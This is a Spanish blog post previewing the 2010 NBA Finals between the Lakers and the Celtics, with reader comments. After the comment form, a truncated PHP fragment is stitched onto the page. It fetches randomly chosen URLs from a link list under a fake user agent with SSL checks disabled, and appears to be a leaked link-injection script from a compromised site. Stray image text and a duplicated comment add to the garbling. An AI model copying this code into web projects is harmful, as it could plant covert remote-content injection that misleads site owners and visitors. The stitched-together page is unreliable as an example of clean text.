Análisis de las Finales 2010: L.A. Lakers vs Boston Celtics

02 de June de 2010 por MagicJohnson32

17 de junio de 2008.

Boston (Massachussets, EE.UU.).

Alrededor de las 21.00 (hora local).

El Garden era una fiesta en la que 18 mil fans y la plantilla de los Celtics celebraban su 17º título tras haber arrasado a los Lakers en el sexto partido de las Finales. Luces deslumbrantes, confeti multicolor, música atronadora, gritos, abrazos, champagne espumoso y puros humeantes.

Tras la puerta cerrada de una habitación, sin embargo, se vivía una historia diferente. Jugadores y técnicos de los Lakers, convocados de urgencia por Kobe Bryant, se reunían para una especie de terapia grupal tras una de las mayores humillaciones en la historia de la franquicia. Quién sabe qué se dijo allí, pero es de suponer que el mensaje fue que aquello no podía volver a pasar y, sobre todo, que la oportunidad de la venganza llegaría.

Y, efectivamente, ha llegado.

lakersvsceltics

Ni el tiempo (dos años han transcurrido), ni los éxitos (los Lakers han ganado las 7 eliminatorias de Playoffs que han jugado desde entonces, incluyendo las pasadas Finales) han sofocado la llama que se encendió aquel día. En realidad los Celtics no hicieron más que echar gasolina al incendio que es desde los 60 la rivalidad Boston-L.A., un incendio que revive de forma periódica. Sucedió en los 80, con los equipos encabezados por Bird y Magic, y volvió a suceder a raíz de las llegadas de Garnett y Gasol a uno y otro equipo. De nuevo en la elite, de rondolbjnuevo dominantes, Celtics y Lakers son los dos últimos campeones, los dos equipos con más títulos (17 y 15 respectivamente) y los dos con más finales disputadas (52 entre ambos). Y prometen una batalla memorable.

Difícilmente podemos tomar como referencia las finales de 2008. Los Celtics son dos años más veteranos, más viejos, más sabios, más duros. Lo que han empeorado las articulaciones de Pierce y Garnett es más o menos equivalente a lo que ha mejorado Rajon Rondo, verdadero referente del equipo en momentos tan cruciales como la serie contra los Cavaliers. Y, desde luego, los actuales Lakers son mejores que los finalistas de 2008, que se vieron sin Bynum, sin Ariza y con Vladimir Radmanovic como titular. La presencia de Artest y la participación, aunque sea con limitaciones, de Bynum suponen un plus enorme, tal vez la diferencia entre el fracaso y la gloria.

El camino de ambos equipos hasta la final ha sido poco menos que impecable. Repasemos la trayectoria de Celtics y Lakers a través de los análisis que hicimos de sus respectivas eliminatorias.

Boston Celtics (12-5)

Primera ronda: Boston Celtics 4 – Miami Heat 1

Semifinales del Este: Cleveland Cavaliers 2 – Boston Celtics 4

Final del Este: Orlando Magic 2 – Boston Celtics 4

paukg

Los Angeles Lakers (12-4)

Primera ronda: Los Angeles Lakers 4 – Oklahoma City Thunder 2

Semifinales del Oeste: Los Angeles Lakers 4 – Utah Jazz 0

Final del Oeste: Los Angeles Lakers 4 – Phoenix Suns 2

Lakers y Celtics se han proclamado campeones de conferencia con brillantez y dando sobrados argumentos para considerarlos dignos del anillo. Si los de Boston han dejado atrás una regular season repleta de dudas para dejar en la cuneta a dos de los principales candidatos al título, los californianos han ido de menos a más y acreditan el muy meritorio registro de cinco eliminatorias consecutivas ganadas fuera de casa. Y, por si fuera poco, permanecen invictos como locales en los Playoffs.

gentry kobeAsí pues, los Lakers llegan con ventaja de campo y con un Kobe prodigioso, autor de una descomunal serie ante los Suns y capaz de alcanzar la treintena de puntos en 10 de los últimos 11 partidos. Ante eso, los Celtics presentan cinco triunfos a domicilio durante las eliminatorias del Este (incluyendo dos en Cleveland y otros dos en Orlando) y un equipo sólido como el cemento.

Veamos qué claves pueden determinar el campeón:

– La batalla en la pintura: de pronto, hay motivos para dudar sobre Pau Gasol. No sabemos si es el cansancio o simplemente que no encontró su sitio ante la zona de los Suns, la cuestión es que el de Sant Boi ha bajado varios peldaños el astronómico nivel al que estaba rindiendo en los Playoffs. Con todos los interrogantes que se ciernen sobre Bynum, al que ayer se le extrajo líquido de la rodilla, más le vale a los Lakers disponer de un Gasol en plenitud de facultades para enfrentarse a Garnett, Perkins y Sheed Wallace. El dominio en el rebote y la capacidad para anotar cerca del aro con buenos porcentajes marcará sin duda diferencias.

kobe game winner– ¿Quién para a Kobe?: Últimamente, nadie. Que se lo pregunten a Alvin Gentry o a Grant Hill, impecable en su defensa sobre Bryant en el tramo final del sexto partido y, aun así, testigo de una proeza tras otra del #24. Ray Allen será el encargado de intentar frenarlo, algo que consiguió en buena medida en las Finales de 2008. El pasado enero, sin embargo, Bryant recordó a Allen y a los Celtics de qué es capaz anotando, con una fabulosa suspensión, uno de los 7 game winners que ha logrado esta temporada. Probablemente Paul Pierce tomará la asignación defensiva cuando los Lakers prueben con 3 bajitos.

– ¿Quién para a Rondo?: El éxito de los Celtics en la postemporada sólo se explica desde el crecimiento de su base, que ha llevado en volandas a los suyos siempre que lo han necesitado. Seguramente Derek Fisher empezará con Rondo pero será Kobe Bryant  quien más minutos pase sobre el ex de Kentucky.

artpierce– El momento de Artest: Para esto se le firmó. Para esto se renunció a un jugador con la proyección de Ariza y se puso en riesgo el equilibrio de egos. Para este preciso momento. En primera ronda, ante Kevin Durant, Artest ya dejó muestras de que se mantiene como un defensor plenamente eficaz. En las Finales, ante un Paul Pierce que llega en su mejor momento de la temporada, Ron-Ron ha de convencer a Buss de que merece el millonario cheque que le extendió, confirmar a Kupchack que no se equivocó al apostar por él, y compensar al universo Laker por tener que soportar sus penetraciones a canasta.

– Las rotaciones: Los Lakers cuentan con el mejor suplente, Lamar Odom, pero los Celtics disponen de más jugadores de banquillo capaces de desequilibrar. Ya se lo hemos visto hacer a Rasheed Wallace, Tony Allen, Glen Davis y Nate Robinson. Con una rotación más larga, los Celtics tratarán de ahogar a los Lakers e imponer su superioridad física. Jackson ha recortado la rotación, casi limitada a Odom, Farmar y la única duda de si optará por Shannon Brown o Sasha Vujacic, quien tras retomar su sitio como segunda rotación exterior vuelve a verse en peligro de no jugar por su absurda acción sobre Dragic en el 6º partido contra los Suns.

– El primer partido: Phil Jackson jamás ha perdido una serie de Playoffs tras anotarse el triunfo en el primer partido. Su balance en tales circunstancias celticsvslakerses de un espectacular 47-0. El primer partido (madrugada del jueves al viernes a las 3.00, hora peninsular española) se presenta por tanto como esencial en las aspiraciones de unos y otros.

Calendario de partidos:

1: Jueves 3 a las 3h en L.A.
2: Domingo 6 a las 2h en L.A.
3: Martes 8 a las 3h en Boston
4: Jueves 10 a las 3h en Boston
5: Domingo 13 a las 2h en Boston
6: Martes 16 a las 3h en L.A.
7: Jueves 18 a las 3h en L.A.

Pronóstico: Lakers campeones (4-2)

Comenta

39 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    LAKERS GO!!!
    impresionante, Magic
    me moría de ganas de que empiece… pero ahora más aún, por tu culpa

      Citar

  2. Txusma dice:
    #2

    Poquito más que añadir, aparte de que Derek Fisher está sobrevalorado… 😛

    Era broma!!! 😀

      Citar

  3. sergio dice:
    #3

    Me juego 10 € a que Fisher decide algun partido xD

    Y esos trivials???

      Citar

  4. MagicJohnson32 dice:
    #4

    ¿Nadie me lleva la contraria? Joer, qué crack que soy :-] O eso, o la he hecho tan larga que ni os la habéis leído, jaja.

    Me extrañaría que Fisher no deje un triplito de los suyos para el recuerdo en estas Finales. Da Fish Rulz!!

    Buf, qué ganas de trasnochar, de ir a trabajar habiendo dormido apenas una hora… ¡¡qué ganas de que empiece!!

      Citar

  5. Las previas de la final de la NBA « Jugones dice:
    #5
  6. wind_bird dice:
    #6

    Yo voy a ser el primero en poner los puntos sobre las ies…
    Primero… que bonito momento el de Kobe llamando a una reunión de urgencia… (hemos visto muchas peliculas…)… Este mismo Kobe… era mejor o peor que el de ahora. Si el equipo lo que quieras, que si Radmanovic, que si tal… y Kobe?, estaba en esa misma final. Si es un jugador tan imparable… como lo hicieron los Celtics?
    Me gusta que hables de la lesión de Bynum… pero siendo periodista, creo que deberías de ser menos Lakerista y decir que la espalda de Rondo, Wallace y Allen (T.) están en malas condiciones… es imperdonable.
    Y no voy a ser mas cruel… porque aun siendo de los Lakers… para mi eres un muy buen colega…;-)

      Citar

  7. Clarck dice:
    #7

    Lo siento, pero Boston se lleva las finales en el 6º partido: 4 a 2.

    1ª clave: El juego interior. La baja de Bynum (aunque juegue, está jugando LESIONADO). Pau es un crack en el juego interior, pero quiero verlo contra KG, Sheed y Davis entre otros. Es decir, lo van a desgastar. Veremos cuanto dura.
    2ª Clave: Rondo. Está tocado, pero aún así dará muchos problemas a Fisher. Según como esté Rondo, las finales tendrán color verde.

    3º Clave: juego individual-equipo: Cierto, Kobe no lo para nadie cuando está enchufado, pero si el juego interior de los amarillos no está al nivel, kobe se pondrá el equipo a la espalda, es decir, tiros y más tiros para el mejor jugador de la liga. y veremos como lo resuelve ante la excelente defensa de Boston.

    Los campeonatos los ganan los equipos, no las individualidades. Por eso y no por otra cosa, los campeones serán los Boston Celtics.

      Citar

  8. daniel dice:
    #8

    Por favor, van a ganar los celtics se va a repitir la historia del 2008. Es mucho mas solido el equipo de los celtics y cuentan con mas anotadores garnet,pierce,allen,randon,wallace. Sin dudas kobe no es jordan por mas que trate de parecerce.O se olvidan de las finales de los lakers contra detroit, por culpa de kobe se perdieron esas finales.
    Los celtics van a ganar las finales 4-2.

      Citar

  9. Love Denise dice:
    #9

    en mi opinión (y sin animo de que me zurreis jajja) el emparejamiento donde los Celtics ganan a Lakers es en el de Rivers vs Jackson. Y no hace falta que me recordeis cuantos anillos tiene cada uno y bla, bla, que ya lo sé.
    El Rondo vs Fisher también es ventajoso para Celtics, pero presumo de que como dice Magic Johnson, Kobe e incluso Shannon lo van a defender durante bastantes minutos. Pierce lo puede pasar mal frente a Artest, y no descartaría juego sucio de éste. En todo los demás emparejamientos, Lakers es superior.

    Nadie se anima a pronosticar??? Bueno. pues seré el primero yo, 4-1 para Lakers ganando el título en la cancha de Boston, vaya, lo que sería un sueño humedo para muchos.

      Citar

  10. TheDeerHunter dice:
    #10

    Será por pronósticos… 4-2 Lakers

      Citar

  11. MagicJohnson32 dice:
    #11

    Joer, Love Denise, no me digas esas cosas (4-1 y ganando el anillo en el Garden) que ya he mojado los pantalones xD

      Citar

  12. wind_bird dice:
    #12

    Si Rondo lo defiende Kobe… a quien defenderá Fisher?

      Citar

  13. Clarck dice:
    #13

    @Love Denise.

    Tienes razón, el duelo de entrenadores será importante. Para mi son de los mejores que hay en la liga.
    Es cierto, Jackson tiene más anillos y es gato viejo, pero Doc tiene a un segundo que sería un primer entrenador en cualquier equipo de la liga: Thibodeau. No veo un duelo tan desigual.

    Sobre la defensa a Rondo, si Kobe va a defender al bueno de Rajon, mal irian las cosas para LA. No hace mucho Lebron quiso parar a Rondo y todos sabemos como acabó la cosa, no porque no pueda, sino por los desequilibrios que puede generar.
    Aunque si Bryant cubre a rondo, a Ray ray lo dejas sólo. (Vujacic o Brawn, tanto da).

    LA tiene un buen perímetro, pero de las tres posiciones una cojea, según donde juegue Bryant. (si es de base, la posición de 2 y viceversa) Y el juego exterior de Boston, los tres puestos, están muy bien cubiertos. (Rondo- Allen-Pierce)

    El juego interior, repito que ahí hay desventaja por parte de LA, sobretodo por Bynum. Gasol y Odom lo van a pasar mal, desde luego.

    El duelo Artest-Pierce, ahi te doy la razón, va a ser clave. Veremos que ocurre.

    En fin, se prevée un duelo apasionante.

      Citar

  14. MagicJohnson32 dice:
    #14

    Lógicamente, si Kobe se sitúa sobre Rondo, Fisher se quedará con Allen.

    La cuestión es que Phil utiliza con frecuencia a Kobe para hacer ayudas y cerrar líneas de pase. Si está sobre Allen no te lo puedes permitir. En cambio con Rondo has de ir con mucho cuidado pero le puedes flotar. Lo hemos visto un millón de veces: Jackson pone a Kobe sobre el peor tirador del equipo rival.

      Citar

  15. MagicJohnson32 dice:
    #15

    @ wind bird: ¿quieres que hable de las lesiones de Rondo, Rasheed y Tony Allen? Entonces tendría que hablar de la rodilla, el tobillo y el dedo de Kobe, del hombro de Odom o de la mano de Artest. De todos, el único que realmente debería estar operado y de baja es Bynum, que en cuanto acaben las Finales pasará por el quirófano.

    Al resto de tu comentario no le encuentro el sentido, en serio. Eso sí, eres un colega de p.m. jeje

    Y una cosa más: no sé muy bien de dónde sale la tendencia a hablar de los Lakers como de un equipo de individualidades.

      Citar

  16. sergio dice:
    #16

    Os dare mi opinion sobre las Finales.
    Yo a Rondo lo defenderia casi siempre con Fisher, dandole un metro de distancia para evitar entradas y que doble balones a los exteriore. Siempre intentando que se decida a tirar… porque es el aspecto en el que menos destaca.
    Bryant es mucho mas peligroso este año que en el 2008 porque tiene mas confianza por el titulo del año pasado, porque su equipo tiene efectivos de mas nivel y puede decidir un partido a base de asistencias (como ya ha pasado en estas eliminatorias), porque llega mas enrachado, porque tiene menos presion,….
    Gasol ha crecido muchisimo en las eliminatorias. Solo comparadlo con las Finales y las Finales de Conferencia del 2008 ante Duncan y Garnett. Eso si, Perkins tambien es un grandisimo defensor y muy intenso. Creo que los aspectos de salud de los jugadores altos de ambos equipos puede acabar siendo muy importante. Tambien supongo que mientras este Sheed en pista, Bynum se quedara fuera y entrara Odom para evitar tiros lejanos.
    Veo a Rivers y su staff tecnico a un nivel altisimo. Pero los entrenadores no son como los jugadores… no suelen tener bajones con la edad. No tengo dudas de que Phil tiene sus ases bajo la manga. Doc Rivers tendra mas variantes en defensa y una rotacion mayor que le hacen parecer un grandisimo entrenador… pero creo que al simplemente motivar a sus jugadores de la manera que lo esta haciendo tiene una gran parte de trabajo hecho.
    Muuy importante el duelo Artest-Pierce en el aspecto defensivo sobre el alero verde. Podria parecer que le conviene la falta de velocidad del de Boston, pero tambien tiene una experiencia, movimientos y veterania con la que todavia no se ha encontrado Artest a estos niveles (excepto el propio Kobe claro…). Aunque claro.. tambien puede ser que Allen, yendo de tapado se marque una serie de esas que hace cada 4 o 5 eliminatorias y se cargue el solito a los Lakers. Ray teniendo una racha de tiro es casi tan peligroso como Kobe.
    Se me antojan fundamentales que los Lakers ganen los dos primeros partidos.. hay se decidirá el titulo.
    En el aspecto de clutch creo que ganan sobradamente los Lakers… puede acabar siendo importante

      Citar

  17. TheDeerHunter dice:
    #17

    Por cierto, que no entiendo eso de “una de las humillaciones más grandes de la historia de la franquicia”.
    Yo creo que fue una victoria sin más, del equipo que era favorito… y que por cierto se resolvió con una de las remontadas más complicadas de la historia, con actuación memorable de Posey (supongo que un mierdecilla según el mega-exigente Wind_Bird)

    Creo que para los Lakers fue todo un logro llegar a aquella final con Radmanovic de titular, Vujacic de pieza clave y Gasol como único pívot, desgastado tras haberse matado contra Duncan, Camby y Boozer.

    Estoy seguro que ha habido un capazo de peores humillaciones (como la de los Pistons, sin remontarme mucho más lejos)

      Citar

  18. MagicJohnson32 dice:
    #18

    No, Deer, la humillación no fue perder las Finales, que como dices no fueron un paseo de los Celtics. La humillación fue perder por 39 el 6º partido.

      Citar

  19. M dice:
    #19

    Ese Ron, a ver con que nos sorprende…muy muy fan de este tipo.

      Citar

  20. educaja dice:
    #20

    Pronostico: 4-3 para Lakers, disfrutemos leches de partidos! jaja
    Veo una eliminatoria muy igualada. A nivel de jugadores, entrenadores y motivaciones, apasionante!
    Me gustaría que Pau y Kobe la armaran bien 😉 Aunque les tengo mucho respeto al orgullo verde.
    Era e loq que creia que este año llegarian los Cavs a la final, para ver un Kobe-Lebron como hubiese deseado Stern, pero un Lakers-Celtics también lo hubiese firmado David 😛

    I LOVE THIS GAME

      Citar

  21. sergio dice:
    #21

    Ups… ayer no puse pronostico. A ver… si los Lakers ganan los dos primeros partidos: 4-2

    Estaba yo pensando… hemos hablado de que Kobe Bryant se ponga a defender a Rondo en algunos momentos del partido, pero… podria ser que Rivers pensara en Rondo para defender a Bryant. Supongo que el unico miembro del quinteto defensivo del año seria apropiado no? Quizas lo que le falte en altura le sobre en brazos. Y las perdidas que podria ocasionarle a Kobe serian la unica manera de sacarlo un poco del partido…

      Citar

  22. TheDeerHunter dice:
    #22

    Yo estaba pensando exáctamente en eso, Sergio. Sal de mi cabeza.

    De todas formas de una cosa sí hay precedentes, de la otra no.

      Citar

  23. Viva_Dirk dice:
    #23

    Podria intentarlo pero si Kobe esta fino en el lanzamiento de media-larga distancia sería mas facil tirar por encima de Rondo que de otro.

      Citar

  24. MagicJohnson32 dice:
    #24

    Si Rivers hace eso, que lo dudo muchísimo, Odom se iría fuera de point-forward, Kobe se va al poste medio a recibir y a anotar fácil por encima de Rondo. No, no creo que ocurra.

      Citar

  25. Clarck dice:
    #25

    La clave para parar a Kobe serán las ayudas en defensa, y desgastarlo, con Tony, Ray, Rondo…

    Sobre la lesión de Bynum, no se puede comparar con la que arrastran los Celtics. Están muy tocados, pero es que Bynum juega completamente lesionado. Creo que el jugador está arriesgando mucho, y se está jugando su carrera, y la franquicia lo sabe.

    Sobre el tema humillaciones, creo que es exagerado, pero bueno, que no se preocupen, ya tendrán otra humillación en su casa en el 6º partido de las finales….así pueden comparar cuál es más dolorosa para ellos…

      Citar

  26. Toni dice:
    #26

    Resultado: 4-2 L.A.
    Ya estoy en tensión… jajajaja.

      Citar

  27. sergio dice:
    #27

    Magic… de verdad ves a Kobe en mas dificultades anotando en el poste bajo frente a Allen que frente a Rondo?? Si va al poste bajo.. solo lo pueden defender con ayudas… y da igual hacerselas a Rondo que a Allen

      Citar

  28. Fer dice:
    #28

    Buenas a todos,
    mi pronóstico es 4-3 para Lakers… a Kobe no hay quien lo pare, y Gasol tiene que demostrar a KG quien manda ahora…
    Por cierto y sin que sirva de precedente, entre en marca.com y vi una noticia en la que Gasol habla de Garnett. Tenéis que leer el comentario #34, es acojonante. Me he partido el culo!!!
    http://www.marca.com/2010/06/03/baloncesto/nba/1275553110.html

      Citar

  29. Jabho dice:
    #29

    Magic, que sepas que lo he leído y no sé si esto es llevarte la contraria pero creo que has hablado poco de Pierce. MVP de aquellas finales, viene de hacer una serie acojonante contra los Magic…The Truth será una de las claves porque en gran medida que el ataque céltico no se atasque pasa por su cabeza.

    Me mojo y veo Boston ganador en 6, y además creo que los Lakers ganaran este primer partido y se romperá esa estadística.

    La clave principal para mi es que la intensidad / dureza / agresividad del juego interior de los célticos saque del partido a Odom-Bynum y sobre todo a Pau…. y me parece factible. Preveo una gran eliminatoria de Garnett.

    También yo veo ventaja para los verdes en el entrenador…

      Citar

  30. MagicJohnson32 dice:
    #30

    ¿Pierce? ¿Pero ya tenéis preparada la silla de ruedas para él por si se rompe una uña o algo?

    :p)

      Citar

  31. Emily dice:
    #31

    Podria intentarlo pero si Kobe esta fino en el lanzamiento de media-larga distancia sería mas facil tirar por encima de Rondo que de otro.

      Citar

  32. mmmm dice:
    #32

    Bueno Magic, la NBA es espectáculo, y él fue un actor del bueno sobre un escenario, jeje. No va, ya en serio, no creo que estuviera preparado, simplemente que pasó así y eso sí, fue la HOSTIA!

    Por cierto @Fer, no sé que gracia tiene el comentario, viene por lo de Farmar? Yo me he reído más con el titular: “Kevin Garnett ya no me habla tanto en la pista”. Me lo he imaginado triste y llorando sobre una almohada porque el que él creía hombre de su vida antes lo trataba mal y ahora ni le habla. Esperemos que al menos lo defienda bien cerquita.

    Everything starts tonight señores. Mi pronóstico: 4-3 para Celtics, las mejores series de la historia!

      Citar

  33. Vader dice:
    #33

    @Fer

    Jajaja que bueno el comentario 34 😀 “le endose un par de pick and roll” con eso ya podriamos dejar de leer… jajaja que crack!!!

      Citar

  34. Txusma dice:
    #34

    Grandioso el comentario de la noticia de MARCA. Vaya fantasma!

      Citar

  35. MagicJohnson32 dice:
    #35

    Sensacional lo del pick and roll en un “face to face”. Joer, me lo he imaginado pidiendo el bloqueo a su compañero imaginario xDDD

      Citar

  36. Fer dice:
    #36

    @mmmm
    la gracia no está en la noticia sino en el comentario de un frikazo que dice que el verano pasado jugó un uno contra uno con Garnett…

      Citar

  37. TheDeerHunter dice:
    #37

    Una cosa está clara… de momento el pronóstico de Jabho está clavado…
    de momento, por supuesto

      Citar

  38. MagicJohnson32 dice:
    #38

    Sí, sobre todo por lo “preveo una gran eliminatoria de Garnett”

    :-p

      Citar

  39. Paola dice:
    #39

    Hola, La verdad me apasiona poder leer todos estos comentarios.

    Me gusta mucho el Equipo de Boston, aunque nadie puede negar que Kobe es el mejor del liga ya de eso no hay duda..
    Pero una sola persona es muy complicado que gane el juego. Boston me gusta mucho es un EQUIPO, juegan en conjunto y tienes puntos fuertes, Rondo imparable no es el mejor lanzador pero es el jugador que mas daña el equilibrio de LA. Pierce esta por un buen momento y hay que darle mucho merito a la banca que no desafina al ingresar al juego hasta el punto de dejar mal parada la defensa de su contricante.

    Por otra parte Gasol es muy bueno pero no le esta alcanzando la llamita hasta el final el adversario lo que hace es agotarlo hasta dejarlo literalmente sin respiro.
    Recordemos que si Kobe no esta enchufado lamentablemente LA se vuelve un 8.

    Me han gustado los juegos muy apasionates y energicos a veces de unas partes mas que de otras pero sin duda estas finales… te dejan a la expectativa.

    Exitos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>